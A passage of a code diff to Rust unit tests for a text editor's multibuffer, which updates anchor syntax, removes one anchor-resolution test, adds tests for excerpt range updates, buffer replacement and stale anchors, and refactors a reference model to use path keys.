} => { *follower_edit_event_count.write() += 1; } @@ -858,9 +897,14 @@ fn test_expand_excerpts(cx: &mut App) { drop(snapshot); multibuffer.update(cx, |multibuffer, cx| { - let line_zero = multibuffer.snapshot(cx).anchor_before(Point::new(0, 0)); + let multibuffer_snapshot = multibuffer.snapshot(cx); + let line_zero = multibuffer_snapshot.anchor_before(Point::new(0, 0)); multibuffer.expand_excerpts( - multibuffer.excerpt_ids(), + multibuffer.snapshot(cx).excerpts().map(|excerpt| { + multibuffer_snapshot + .anchor_in_excerpt(excerpt.context.start) + .unwrap() + }), 1, ExpandExcerptDirection::UpAndDown, cx, @@ -1157,16 +1201,10 @@ fn test_multibuffer_anchors(cx: &mut App) { .to_offset(&old_snapshot), MultiBufferOffset(0) ); - assert_eq!(Anchor::min().to_offset(&old_snapshot), MultiBufferOffset(0)); - assert_eq!(Anchor::min().to_offset(&old_snapshot), MultiBufferOffset(0)); - assert_eq!( - Anchor::max().to_offset(&old_snapshot), - MultiBufferOffset(10) - ); - assert_eq!( - Anchor::max().to_offset(&old_snapshot), - MultiBufferOffset(10) - ); + assert_eq!(Anchor::Min.to_offset(&old_snapshot), MultiBufferOffset(0)); + assert_eq!(Anchor::Min.to_offset(&old_snapshot), MultiBufferOffset(0)); + assert_eq!(Anchor::Max.to_offset(&old_snapshot), MultiBufferOffset(10)); + assert_eq!(Anchor::Max.to_offset(&old_snapshot), MultiBufferOffset(10)); buffer_1.update(cx, |buffer, cx| { buffer.edit([(0..0, "W")], None, cx); @@ -1243,153 +1281,6 @@ fn test_multibuffer_anchors(cx: &mut App) { ); } -#[gpui::test] -fn test_resolving_anchors_after_replacing_their_excerpts(cx: &mut App) { - let buffer_1 = cx.new(|cx| Buffer::local("abcd", cx)); - let buffer_2 = cx.new(|cx| Buffer::local("ABCDEFGHIJKLMNOP", cx)); - let multibuffer = cx.new(|_| MultiBuffer::new(Capability::ReadWrite)); - - // Create an insertion id in buffer 1 that doesn't exist in buffer 2. - // Add an excerpt from buffer 1 that spans this new insertion. 
- buffer_1.update(cx, |buffer, cx| buffer.edit([(4..4, "123")], None, cx)); - let excerpt_id_1 = multibuffer.update(cx, |multibuffer, cx| { - let buffer_1_snapshot = buffer_1.read(cx).snapshot(); - multibuffer.set_excerpt_ranges_for_path( - PathKey::sorted(0), - buffer_1, - &buffer_1_snapshot, - vec![ExcerptRange::new((0..7).to_point(&buffer_1_snapshot))], - cx, - ); - multibuffer.excerpt_ids().into_iter().next().unwrap() - }); - - let snapshot_1 = multibuffer.read(cx).snapshot(cx); - assert_eq!(snapshot_1.text(), "abcd123"); - - // Replace the buffer 1 excerpt with new excerpts from buffer 2. - let (excerpt_id_2, _excerpt_id_3) = multibuffer.update(cx, |multibuffer, cx| { - multibuffer.remove_excerpts_for_path(PathKey::sorted(0), cx); - let snapshot_2 = buffer_2.read(cx).snapshot(); - multibuffer.set_excerpt_ranges_for_path( - PathKey::sorted(1), - buffer_2.clone(), - &buffer_2.read(cx).snapshot(), - vec![ - ExcerptRange::new((0..4).to_point(&snapshot_2)), - ExcerptRange::new((6..10).to_point(&snapshot_2)), - ExcerptRange::new((12..16).to_point(&snapshot_2)), - ], - cx, - ); - let mut ids = multibuffer - .excerpts_for_buffer(buffer_2.read(cx).remote_id(), cx) - .into_iter() - .map(|(id, _)| id); - (ids.next().unwrap(), ids.next().unwrap()) - }); - let snapshot_2 = multibuffer.read(cx).snapshot(cx); - assert_eq!(snapshot_2.text(), "ABCD\nGHIJ\nMNOP"); - - // The old excerpt id doesn't get reused. - assert_ne!(excerpt_id_2, excerpt_id_1); - - // Resolve some anchors from the previous snapshot in the new snapshot. - // The current excerpts are from a different buffer, so we don't attempt to - // resolve the old text anchor in the new buffer. 
- assert_eq!( - snapshot_2.summary_for_anchor::( - &snapshot_1.anchor_before(MultiBufferOffset(2)) - ), - MultiBufferOffset(0) - ); - assert_eq!( - snapshot_2.summaries_for_anchors::(&[ - snapshot_1.anchor_before(MultiBufferOffset(2)), - snapshot_1.anchor_after(MultiBufferOffset(3)) - ]), - vec![MultiBufferOffset(0), MultiBufferOffset(0)] - ); - - // Refresh anchors from the old snapshot. The return value indicates that both - // anchors lost their original excerpt. - let refresh = snapshot_2.refresh_anchors(&[ - snapshot_1.anchor_before(MultiBufferOffset(2)), - snapshot_1.anchor_after(MultiBufferOffset(3)), - ]); - assert_eq!( - refresh, - &[ - (0, snapshot_2.anchor_before(MultiBufferOffset(0)), false), - (1, snapshot_2.anchor_after(MultiBufferOffset(0)), false), - ] - ); - - // Replace the middle excerpt with a smaller excerpt in buffer 2, - // that intersects the old excerpt. - multibuffer.update(cx, |multibuffer, cx| { - let snapshot_2 = buffer_2.read(cx).snapshot(); - multibuffer.set_excerpt_ranges_for_path( - PathKey::sorted(1), - buffer_2.clone(), - &buffer_2.read(cx).snapshot(), - vec![ - ExcerptRange::new((0..4).to_point(&snapshot_2)), - ExcerptRange::new((12..16).to_point(&snapshot_2)), - ], - cx, - ); - multibuffer.set_excerpt_ranges_for_path( - PathKey::sorted(1), - buffer_2.clone(), - &buffer_2.read(cx).snapshot(), - vec![ - ExcerptRange::new((0..4).to_point(&snapshot_2)), - ExcerptRange::new((5..8).to_point(&snapshot_2)), - ExcerptRange::new((12..16).to_point(&snapshot_2)), - ], - cx, - ); - }); - - let snapshot_3 = multibuffer.read(cx).snapshot(cx); - assert_eq!(snapshot_3.text(), "ABCD\nFGH\nMNOP"); - - // Resolve some anchors from the previous snapshot in the new snapshot. - // The third anchor can't be resolved, since its excerpt has been removed, - // so it resolves to the same position as its predecessor. 
- let anchors = [ - snapshot_2.anchor_before(MultiBufferOffset(0)), - snapshot_2.anchor_after(MultiBufferOffset(2)), - snapshot_2.anchor_after(MultiBufferOffset(6)), - snapshot_2.anchor_after(MultiBufferOffset(14)), - ]; - assert_eq!( - snapshot_3.summaries_for_anchors::(&anchors), - &[ - MultiBufferOffset(0), - MultiBufferOffset(2), - MultiBufferOffset(9), - MultiBufferOffset(13) - ] - ); - - let new_anchors = snapshot_3.refresh_anchors(&anchors); - assert_eq!( - new_anchors.iter().map(|a| (a.0, a.2)).collect::>(), - &[(0, true), (1, true), (2, true), (3, true)] - ); - assert_eq!( - snapshot_3.summaries_for_anchors::(new_anchors.iter().map(|a| &a.1)), - &[ - MultiBufferOffset(0), - MultiBufferOffset(2), - MultiBufferOffset(7), - MultiBufferOffset(13) - ] - ); -} - #[gpui::test] async fn test_basic_diff_hunks(cx: &mut TestAppContext) { let text = indoc!( @@ -1440,7 +1331,7 @@ async fn test_basic_diff_hunks(cx: &mut TestAppContext) { ); multibuffer.update(cx, |multibuffer, cx| { - multibuffer.expand_diff_hunks(vec![Anchor::min()..Anchor::max()], cx); + multibuffer.expand_diff_hunks(vec![Anchor::Min..Anchor::Max], cx); }); assert_new_snapshot( @@ -1486,7 +1377,7 @@ async fn test_basic_diff_hunks(cx: &mut TestAppContext) { assert_line_indents(&snapshot); multibuffer.update(cx, |multibuffer, cx| { - multibuffer.collapse_diff_hunks(vec![Anchor::min()..Anchor::max()], cx) + multibuffer.collapse_diff_hunks(vec![Anchor::Min..Anchor::Max], cx) }); assert_new_snapshot( &multibuffer, @@ -1673,7 +1564,7 @@ async fn test_repeatedly_expand_a_diff_hunk(cx: &mut TestAppContext) { }); multibuffer.update(cx, |multibuffer, cx| { - multibuffer.expand_diff_hunks(vec![Anchor::min()..Anchor::max()], cx); + multibuffer.expand_diff_hunks(vec![Anchor::Min..Anchor::Max], cx); }); assert_new_snapshot( @@ -1724,7 +1615,7 @@ async fn test_repeatedly_expand_a_diff_hunk(cx: &mut TestAppContext) { // Now collapse all diff hunks multibuffer.update(cx, |multibuffer, cx| { - 
multibuffer.collapse_diff_hunks(vec![Anchor::min()..Anchor::max()], cx); + multibuffer.collapse_diff_hunks(vec![Anchor::Min..Anchor::Max], cx); }); assert_new_snapshot( @@ -2070,6 +1961,203 @@ fn test_set_excerpts_for_buffer(cx: &mut TestAppContext) { }); } +#[gpui::test] +fn test_update_excerpt_ranges_for_path(cx: &mut TestAppContext) { + let buffer = cx.new(|cx| { + Buffer::local( + indoc! { + "row 0 + row 1 + row 2 + row 3 + row 4 + row 5 + row 6 + row 7 + row 8 + row 9 + row 10 + row 11 + row 12 + row 13 + row 14 + "}, + cx, + ) + }); + let path = PathKey::with_sort_prefix(0, rel_path("test.rs").into_arc()); + + let multibuffer = cx.new(|_| MultiBuffer::new(Capability::ReadWrite)); + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpts_for_path( + path.clone(), + buffer.clone(), + vec![Point::row_range(2..4), Point::row_range(8..10)], + 0, + cx, + ); + }); + assert_excerpts_match( + &multibuffer, + cx, + indoc! {"----- + row 2 + row 3 + row 4 + ----- + row 8 + row 9 + row 10 + "}, + ); + + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.update_excerpts_for_path( + path.clone(), + buffer.clone(), + vec![Point::row_range(12..13)], + 0, + cx, + ); + }); + assert_excerpts_match( + &multibuffer, + cx, + indoc! {"----- + row 12 + row 13 + "}, + ); + + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpts_for_path( + path.clone(), + buffer.clone(), + vec![Point::row_range(2..4)], + 0, + cx, + ); + }); + assert_excerpts_match( + &multibuffer, + cx, + indoc! {"----- + row 2 + row 3 + row 4 + "}, + ); + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.update_excerpts_for_path( + path.clone(), + buffer.clone(), + vec![Point::row_range(3..5)], + 0, + cx, + ); + }); + assert_excerpts_match( + &multibuffer, + cx, + indoc! 
{"----- + row 2 + row 3 + row 4 + row 5 + "}, + ); + + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpts_for_path( + path.clone(), + buffer.clone(), + vec![ + Point::row_range(0..1), + Point::row_range(6..8), + Point::row_range(12..13), + ], + 0, + cx, + ); + }); + assert_excerpts_match( + &multibuffer, + cx, + indoc! {"----- + row 0 + row 1 + ----- + row 6 + row 7 + row 8 + ----- + row 12 + row 13 + "}, + ); + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.update_excerpts_for_path( + path.clone(), + buffer.clone(), + vec![Point::row_range(7..9)], + 0, + cx, + ); + }); + assert_excerpts_match( + &multibuffer, + cx, + indoc! {"----- + row 6 + row 7 + row 8 + row 9 + "}, + ); + + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpts_for_path( + path.clone(), + buffer.clone(), + vec![Point::row_range(2..3), Point::row_range(6..7)], + 0, + cx, + ); + }); + assert_excerpts_match( + &multibuffer, + cx, + indoc! {"----- + row 2 + row 3 + ----- + row 6 + row 7 + "}, + ); + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.update_excerpts_for_path( + path.clone(), + buffer.clone(), + vec![Point::row_range(3..6)], + 0, + cx, + ); + }); + assert_excerpts_match( + &multibuffer, + cx, + indoc! {"----- + row 2 + row 3 + row 4 + row 5 + row 6 + row 7 + "}, + ); +} + #[gpui::test] fn test_set_excerpts_for_buffer_rename(cx: &mut TestAppContext) { let buf1 = cx.new(|cx| { @@ -2152,43 +2240,442 @@ fn test_set_excerpts_for_buffer_rename(cx: &mut TestAppContext) { } #[gpui::test] -async fn test_diff_hunks_with_multiple_excerpts(cx: &mut TestAppContext) { - let base_text_1 = indoc!( - " - one - two - three - four - five - six - " - ); - let text_1 = indoc!( - " - ZERO - one - TWO +fn test_set_excerpts_for_path_replaces_previous_buffer(cx: &mut TestAppContext) { + let buffer_a = cx.new(|cx| { + Buffer::local( + indoc! 
{ + "alpha + beta + gamma + delta + epsilon + ", + }, + cx, + ) + }); + let buffer_b = cx.new(|cx| { + Buffer::local( + indoc! { + "one + two three - six - " - ); - let base_text_2 = indoc!( - " - seven - eight - nine - ten - eleven - twelve - " - ); - let text_2 = indoc!( - " - eight - nine - eleven - THIRTEEN - FOURTEEN + four + ", + }, + cx, + ) + }); + let path: PathKey = PathKey::with_sort_prefix(0, rel_path("shared/path").into_arc()); + + let multibuffer = cx.new(|_| MultiBuffer::new(Capability::ReadWrite)); + let removed_buffer_ids: Arc>> = Default::default(); + multibuffer.update(cx, |_, cx| { + let removed_buffer_ids = removed_buffer_ids.clone(); + cx.subscribe(&multibuffer, move |_, _, event, _| { + if let Event::BuffersRemoved { + removed_buffer_ids: ids, + } = event + { + removed_buffer_ids.write().extend(ids.iter().copied()); + } + }) + .detach(); + }); + + let ranges_a = vec![Point::row_range(0..1), Point::row_range(3..4)]; + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpts_for_path(path.clone(), buffer_a.clone(), ranges_a.clone(), 0, cx); + }); + let (anchor_a1, anchor_a2) = multibuffer.read_with(cx, |multibuffer, cx| { + let snapshot = multibuffer.snapshot(cx); + let buffer_snapshot = buffer_a.read(cx).snapshot(); + let mut anchors = ranges_a.into_iter().filter_map(|range| { + let text_range = buffer_snapshot.anchor_range_inside(range); + let start = snapshot.anchor_in_buffer(text_range.start)?; + let end = snapshot.anchor_in_buffer(text_range.end)?; + Some(start..end) + }); + ( + anchors.next().expect("should have first anchor"), + anchors.next().expect("should have second anchor"), + ) + }); + + assert_excerpts_match( + &multibuffer, + cx, + indoc! 
{ + "----- + alpha + beta + ----- + delta + epsilon + " + }, + ); + + let buffer_a_id = buffer_a.read_with(cx, |buffer, _| buffer.remote_id()); + multibuffer.read_with(cx, |multibuffer, cx| { + let snapshot = multibuffer.snapshot(cx); + assert!( + snapshot + .excerpts() + .any(|excerpt| excerpt.context.start.buffer_id == buffer_a_id), + ); + }); + + let ranges_b = vec![Point::row_range(1..2)]; + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpts_for_path(path.clone(), buffer_b.clone(), ranges_b.clone(), 1, cx); + }); + let anchor_b = multibuffer.read_with(cx, |multibuffer, cx| { + let snapshot = multibuffer.snapshot(cx); + let buffer_snapshot = buffer_b.read(cx).snapshot(); + ranges_b + .into_iter() + .filter_map(|range| { + let text_range = buffer_snapshot.anchor_range_inside(range); + let start = snapshot.anchor_in_buffer(text_range.start)?; + let end = snapshot.anchor_in_buffer(text_range.end)?; + Some(start..end) + }) + .next() + .expect("should have an anchor") + }); + + let buffer_b_id = buffer_b.read_with(cx, |buffer, _| buffer.remote_id()); + multibuffer.read_with(cx, |multibuffer, cx| { + let snapshot = multibuffer.snapshot(cx); + assert!( + !snapshot + .excerpts() + .any(|excerpt| excerpt.context.start.buffer_id == buffer_a_id), + ); + assert!( + snapshot + .excerpts() + .any(|excerpt| excerpt.context.start.buffer_id == buffer_b_id), + ); + assert!( + multibuffer.buffer(buffer_a_id).is_none(), + "old buffer should be fully removed from the multibuffer" + ); + assert!( + multibuffer.buffer(buffer_b_id).is_some(), + "new buffer should be present in the multibuffer" + ); + }); + assert!( + removed_buffer_ids.read().contains(&buffer_a_id), + "BuffersRemoved event should have been emitted for the old buffer" + ); + + assert_excerpts_match( + &multibuffer, + cx, + indoc! 
{ + "----- + one + two + three + four + " + }, + ); + + multibuffer.read_with(cx, |multibuffer, cx| { + let snapshot = multibuffer.snapshot(cx); + anchor_a1.start.cmp(&anchor_b.start, &snapshot); + anchor_a1.end.cmp(&anchor_b.end, &snapshot); + anchor_a1.start.cmp(&anchor_a2.start, &snapshot); + anchor_a1.end.cmp(&anchor_a2.end, &snapshot); + }); +} + +#[gpui::test] +fn test_stale_anchor_after_buffer_removal_and_path_reuse(cx: &mut TestAppContext) { + let buffer_a = cx.new(|cx| Buffer::local("aaa\nbbb\nccc\n", cx)); + let buffer_b = cx.new(|cx| Buffer::local("xxx\nyyy\nzzz\n", cx)); + let buffer_other = cx.new(|cx| Buffer::local("111\n222\n333\n", cx)); + let path = PathKey::with_sort_prefix(0, rel_path("the/path").into_arc()); + let other_path = PathKey::with_sort_prefix(1, rel_path("other/path").into_arc()); + + let multibuffer = cx.new(|_| MultiBuffer::new(Capability::ReadWrite)); + + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpts_for_path( + path.clone(), + buffer_a.clone(), + [Point::new(0, 0)..Point::new(2, 3)], + 0, + cx, + ); + multibuffer.set_excerpts_for_path( + other_path.clone(), + buffer_other.clone(), + [Point::new(0, 0)..Point::new(2, 3)], + 0, + cx, + ); + }); + + buffer_a.update(cx, |buffer, cx| { + buffer.edit( + [(Point::new(1, 0)..Point::new(1, 0), "INSERTED ")], + None, + cx, + ); + }); + + let stale_anchor = multibuffer.read_with(cx, |multibuffer, cx| { + let snapshot = multibuffer.snapshot(cx); + snapshot.anchor_before(Point::new(1, 5)) + }); + + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.remove_excerpts(path.clone(), cx); + }); + + multibuffer.read_with(cx, |multibuffer, cx| { + let snapshot = multibuffer.snapshot(cx); + let offset = stale_anchor.to_offset(&snapshot); + assert!( + offset.0 <= snapshot.len().0, + "stale anchor resolved to offset {offset:?} but multibuffer len is {:?}", + snapshot.len() + ); + }); + + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpts_for_path( + 
path.clone(), + buffer_b.clone(), + [Point::new(0, 0)..Point::new(2, 3)], + 0, + cx, + ); + }); + + multibuffer.read_with(cx, |multibuffer, cx| { + let snapshot = multibuffer.snapshot(cx); + let offset = stale_anchor.to_offset(&snapshot); + assert!( + offset.0 <= snapshot.len().0, + "stale anchor resolved to offset {offset:?} but multibuffer len is {:?}", + snapshot.len() + ); + }); +} + +#[gpui::test] +async fn test_map_excerpt_ranges(cx: &mut TestAppContext) { + let base_text = indoc!( + " + { + (aaa) + (bbb) + (ccc) + } + xxx + yyy + zzz + [ + (ddd) + (EEE) + ] + " + ); + let text = indoc!( + " + { + (aaa) + (CCC) + } + xxx + yyy + zzz + [ + (ddd) + (EEE) + ] + " + ); + + let buffer = cx.new(|cx| Buffer::local(text, cx)); + let diff = cx + .new(|cx| BufferDiff::new_with_base_text(base_text, &buffer.read(cx).text_snapshot(), cx)); + cx.run_until_parked(); + + let multibuffer = cx.new(|cx| { + let mut multibuffer = MultiBuffer::new(Capability::ReadWrite); + multibuffer.set_excerpts_for_path( + PathKey::sorted(0), + buffer.clone(), + [ + Point::new(0, 0)..Point::new(3, 1), + Point::new(7, 0)..Point::new(10, 1), + ], + 0, + cx, + ); + multibuffer.add_diff(diff.clone(), cx); + multibuffer + }); + + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.expand_diff_hunks(vec![Anchor::Min..Anchor::Max], cx); + }); + cx.run_until_parked(); + + let snapshot = multibuffer.read_with(cx, |multibuffer, cx| multibuffer.snapshot(cx)); + + let actual_diff = format_diff( + &snapshot.text(), + &snapshot.row_infos(MultiBufferRow(0)).collect::>(), + &Default::default(), + None, + ); + pretty_assertions::assert_eq!( + actual_diff, + indoc!( + " + { + (aaa) + - (bbb) + - (ccc) + + (CCC) + } [\u{2193}] + [ [\u{2191}] + (ddd) + (EEE) + ] [\u{2193}]" + ) + ); + + assert_eq!( + snapshot.map_excerpt_ranges( + snapshot.point_to_offset(Point::new(1, 3))..snapshot.point_to_offset(Point::new(1, 3)), + |buffer, excerpt_range, input_range| { + assert_eq!( + 
buffer.offset_to_point(input_range.start.0) + ..buffer.offset_to_point(input_range.end.0), + Point::new(1, 3)..Point::new(1, 3), + ); + assert_eq!( + buffer.offset_to_point(excerpt_range.context.start.0) + ..buffer.offset_to_point(excerpt_range.context.end.0), + Point::new(0, 0)..Point::new(3, 1), + ); + vec![ + (input_range.start..BufferOffset(input_range.start.0 + 3), ()), + (excerpt_range.context, ()), + ( + BufferOffset(text::ToOffset::to_offset(&Point::new(2, 2), buffer)) + ..BufferOffset(text::ToOffset::to_offset(&Point::new(2, 7), buffer)), + (), + ), + ( + BufferOffset(text::ToOffset::to_offset(&Point::new(0, 0), buffer)) + ..BufferOffset(text::ToOffset::to_offset(&Point::new(2, 0), buffer)), + (), + ), + ] + }, + ), + Some(vec![ + ( + snapshot.point_to_offset(Point::new(1, 3)) + ..snapshot.point_to_offset(Point::new(1, 6)), + (), + ), + ( + snapshot.point_to_offset(Point::zero())..snapshot.point_to_offset(Point::new(5, 1)), + () + ), + ( + snapshot.point_to_offset(Point::new(4, 2)) + ..snapshot.point_to_offset(Point::new(4, 7)), + (), + ), + ( + snapshot.point_to_offset(Point::zero())..snapshot.point_to_offset(Point::new(4, 0)), + () + ), + ]), + ); + + assert_eq!( + snapshot.map_excerpt_ranges( + snapshot.point_to_offset(Point::new(5, 0))..snapshot.point_to_offset(Point::new(7, 0)), + |_, _, range| vec![(range, ())], + ), + None, + ); + + assert_eq!( + snapshot.map_excerpt_ranges( + snapshot.point_to_offset(Point::new(7, 3))..snapshot.point_to_offset(Point::new(7, 6)), + |buffer, excerpt_range, input_range| { + assert_eq!( + buffer.offset_to_point(input_range.start.0) + ..buffer.offset_to_point(input_range.end.0), + Point::new(8, 3)..Point::new(8, 6), + ); + assert_eq!( + buffer.offset_to_point(excerpt_range.context.start.0) + ..buffer.offset_to_point(excerpt_range.context.end.0), + Point::new(7, 0)..Point::new(10, 1), + ); + vec![(input_range, ())] + }, + ), + Some(vec![( + snapshot.point_to_offset(Point::new(7, 
3))..snapshot.point_to_offset(Point::new(7, 6)), + (), + )]), + ); +} + +#[gpui::test] +async fn test_diff_hunks_with_multiple_excerpts(cx: &mut TestAppContext) { + let base_text_1 = indoc!( + " + one + two + three + four + five + six + " + ); + let text_1 = indoc!( + " + ZERO + one + TWO + three + six + " + ); + let base_text_2 = indoc!( + " + seven + eight + nine + ten + eleven + twelve + " + ); + let text_2 = indoc!( + " + eight + nine + eleven + THIRTEEN + FOURTEEN " ); @@ -2246,7 +2733,7 @@ async fn test_diff_hunks_with_multiple_excerpts(cx: &mut TestAppContext) { ); multibuffer.update(cx, |multibuffer, cx| { - multibuffer.expand_diff_hunks(vec![Anchor::min()..Anchor::max()], cx); + multibuffer.expand_diff_hunks(vec![Anchor::Min..Anchor::Max], cx); }); assert_new_snapshot( @@ -2396,101 +2883,137 @@ struct ReferenceMultibuffer { excerpts: Vec, diffs: HashMap>, inverted_diffs: HashMap, Entity)>, + expanded_diff_hunks_by_buffer: HashMap>, } -#[derive(Debug)] +#[derive(Clone, Debug)] struct ReferenceExcerpt { - id: ExcerptId, + path_key: PathKey, + path_key_index: PathKeyIndex, buffer: Entity, range: Range, - expanded_diff_hunks: Vec, } -#[derive(Debug)] +#[derive(Clone, Debug)] struct ReferenceRegion { buffer_id: Option, range: Range, - buffer_range: Option>, + buffer_range: Range, + // if this is a deleted hunk, the main buffer anchor to which the deleted content is attached + deleted_hunk_anchor: Option, status: Option, - excerpt_id: Option, + excerpt: Option, } impl ReferenceMultibuffer { - fn expand_excerpts(&mut self, excerpts: &HashSet, line_count: u32, cx: &App) { - if line_count == 0 { + fn expand_excerpts( + &mut self, + excerpts: &HashSet>, + line_count: u32, + cx: &mut App, + ) { + use text::AnchorRangeExt as _; + + if line_count == 0 || excerpts.is_empty() { return; } - for id in excerpts { - let excerpt = self.excerpts.iter_mut().find(|e| e.id == *id).unwrap(); - let snapshot = excerpt.buffer.read(cx).snapshot(); - let mut point_range = 
excerpt.range.to_point(&snapshot); - point_range.start = Point::new(point_range.start.row.saturating_sub(line_count), 0); - point_range.end = - snapshot.clip_point(Point::new(point_range.end.row + line_count, 0), Bias::Left); - point_range.end.column = snapshot.line_len(point_range.end.row); - excerpt.range = - snapshot.anchor_before(point_range.start)..snapshot.anchor_after(point_range.end); + let mut excerpts_by_buffer: HashMap>> = + HashMap::default(); + for excerpt in excerpts { + excerpts_by_buffer + .entry(excerpt.context.start.buffer_id) + .or_default() + .push(excerpt.clone()) } - } - fn remove_excerpt(&mut self, id: ExcerptId, cx: &App) { - let ix = self - .excerpts - .iter() - .position(|excerpt| excerpt.id == id) - .unwrap(); - let excerpt = self.excerpts.remove(ix); - let buffer = excerpt.buffer.read(cx); - let buffer_id = buffer.remote_id(); - log::info!( - "Removing excerpt {}: {:?}", - ix, - buffer - .text_for_range(excerpt.range.to_offset(buffer)) - .collect::(), - ); - if !self - .excerpts - .iter() - .any(|excerpt| excerpt.buffer.read(cx).remote_id() == buffer_id) - { - self.diffs.remove(&buffer_id); - self.inverted_diffs.remove(&buffer_id); + for (buffer_id, excerpts_to_expand) in excerpts_by_buffer { + let mut buffer = None; + let mut buffer_snapshot = None; + let mut path = None; + let mut path_key_index = None; + let mut new_ranges = + self.excerpts + .iter() + .filter(|excerpt| excerpt.range.start.buffer_id == buffer_id) + .map(|excerpt| { + let snapshot = excerpt.buffer.read(cx).snapshot(); + let mut range = excerpt.range.to_point(&snapshot); + if excerpts_to_expand.iter().any(|info| { + excerpt.range.contains_anchor(info.context.start, &snapshot) + }) { + range.start = Point::new(range.start.row.saturating_sub(line_count), 0); + range.end = snapshot + .clip_point(Point::new(range.end.row + line_count, 0), Bias::Left); + range.end.column = snapshot.line_len(range.end.row); + } + buffer = Some(excerpt.buffer.clone()); + buffer_snapshot = 
Some(snapshot); + path = Some(excerpt.path_key.clone()); + path_key_index = Some(excerpt.path_key_index); + ExcerptRange::new(range) + }) + .collect::>(); + + new_ranges.sort_by(|l, r| l.context.start.cmp(&r.context.start)); + + self.set_excerpts( + path.unwrap(), + path_key_index.unwrap(), + buffer.unwrap(), + &buffer_snapshot.unwrap(), + new_ranges, + cx, + ); } } - fn insert_excerpt_after( + fn set_excerpts( &mut self, - prev_id: ExcerptId, - new_excerpt_id: ExcerptId, - (buffer_handle, anchor_range): (Entity, Range), + path_key: PathKey, + path_key_index: PathKeyIndex, + buffer: Entity, + buffer_snapshot: &BufferSnapshot, + ranges: Vec>, + cx: &mut App, ) { - let excerpt_ix = if prev_id == ExcerptId::max() { - self.excerpts.len() - } else { - self.excerpts - .iter() - .position(|excerpt| excerpt.id == prev_id) - .unwrap() - + 1 - }; - self.excerpts.insert( - excerpt_ix, - ReferenceExcerpt { - id: new_excerpt_id, - buffer: buffer_handle, - range: anchor_range, - expanded_diff_hunks: Vec::new(), - }, + self.excerpts.retain(|excerpt| { + excerpt.path_key != path_key && excerpt.buffer.entity_id() != buffer.entity_id() + }); + + let ranges = MultiBuffer::merge_excerpt_ranges(&ranges); + + let (Ok(ix) | Err(ix)) = self + .excerpts + .binary_search_by(|probe| probe.path_key.cmp(&path_key)); + self.excerpts.splice( + ix..ix, + ranges.into_iter().map(|range| ReferenceExcerpt { + path_key: path_key.clone(), + path_key_index, + buffer: buffer.clone(), + range: buffer_snapshot.anchor_before(range.context.start) + ..buffer_snapshot.anchor_after(range.context.end), + }), ); + self.update_expanded_diff_hunks_for_buffer(buffer_snapshot.remote_id(), cx); } - fn expand_diff_hunks(&mut self, excerpt_id: ExcerptId, range: Range, cx: &App) { + fn expand_diff_hunks(&mut self, path_key: PathKey, range: Range, cx: &App) { let excerpt = self .excerpts .iter_mut() - .find(|e| e.id == excerpt_id) + .find(|e| { + e.path_key == path_key + && e.range + .start + .cmp(&range.start, 
&e.buffer.read(cx).snapshot()) + .is_le() + && e.range + .end + .cmp(&range.end, &e.buffer.read(cx).snapshot()) + .is_ge() + }) .unwrap(); let buffer = excerpt.buffer.read(cx).snapshot(); let buffer_id = buffer.remote_id(); @@ -2503,36 +3026,47 @@ impl ReferenceMultibuffer { let Some(diff) = self.diffs.get(&buffer_id) else { return; }; - let excerpt_range = excerpt.range.to_offset(&buffer); + let excerpt_range = excerpt.range.to_point(&buffer); + let expanded_diff_hunks = self + .expanded_diff_hunks_by_buffer + .entry(buffer_id) + .or_default(); for hunk in diff .read(cx) .snapshot(cx) .hunks_intersecting_range(range, &buffer) { - let hunk_range = hunk.buffer_range.to_offset(&buffer); + let hunk_range = hunk.buffer_range.to_point(&buffer); if hunk_range.start < excerpt_range.start || hunk_range.start > excerpt_range.end { continue; } - if let Err(ix) = excerpt - .expanded_diff_hunks + if let Err(ix) = expanded_diff_hunks .binary_search_by(|anchor| anchor.cmp(&hunk.buffer_range.start, &buffer)) { log::info!( - "expanding diff hunk {:?}. excerpt:{:?}, excerpt range:{:?}", + "expanding diff hunk {:?}. 
excerpt range: {:?}, buffer {:?}", hunk_range, - excerpt_id, - excerpt_range + excerpt_range, + buffer.remote_id() ); - excerpt - .expanded_diff_hunks - .insert(ix, hunk.buffer_range.start); + expanded_diff_hunks.insert(ix, hunk.buffer_range.start); } else { - log::trace!("hunk {hunk_range:?} already expanded in excerpt {excerpt_id:?}"); + log::trace!("hunk {hunk_range:?} already expanded in excerpt"); } } } - fn expected_content(&self, cx: &App) -> (String, Vec, HashSet) { + fn expected_content( + &self, + cx: &App, + ) -> ( + String, + Vec, + HashSet, + Vec, + ) { + use util::maybe; + let mut text = String::new(); let mut regions = Vec::::new(); let mut excerpt_boundary_rows = HashSet::default(); @@ -2568,11 +3102,10 @@ impl ReferenceMultibuffer { regions.push(ReferenceRegion { buffer_id: Some(buffer_id), range: len..text.len(), - buffer_range: Some( - (offset..hunk_base_range.start).to_point(&buffer), - ), + buffer_range: (offset..hunk_base_range.start).to_point(&buffer), status: None, - excerpt_id: Some(excerpt.id), + excerpt: Some(excerpt.clone()), + deleted_hunk_anchor: None, }); } } @@ -2584,9 +3117,10 @@ impl ReferenceMultibuffer { regions.push(ReferenceRegion { buffer_id: Some(buffer_id), range: len..text.len(), - buffer_range: Some(hunk_base_range.to_point(&buffer)), + buffer_range: hunk_base_range.to_point(&buffer), status: Some(DiffHunkStatus::deleted(hunk.secondary_status)), - excerpt_id: Some(excerpt.id), + excerpt: Some(excerpt.clone()), + deleted_hunk_anchor: None, }); } @@ -2600,9 +3134,10 @@ impl ReferenceMultibuffer { regions.push(ReferenceRegion { buffer_id: Some(buffer_id), range: len..text.len(), - buffer_range: Some((offset..buffer_range.end).to_point(&buffer)), + buffer_range: (offset..buffer_range.end).to_point(&buffer), status: None, - excerpt_id: 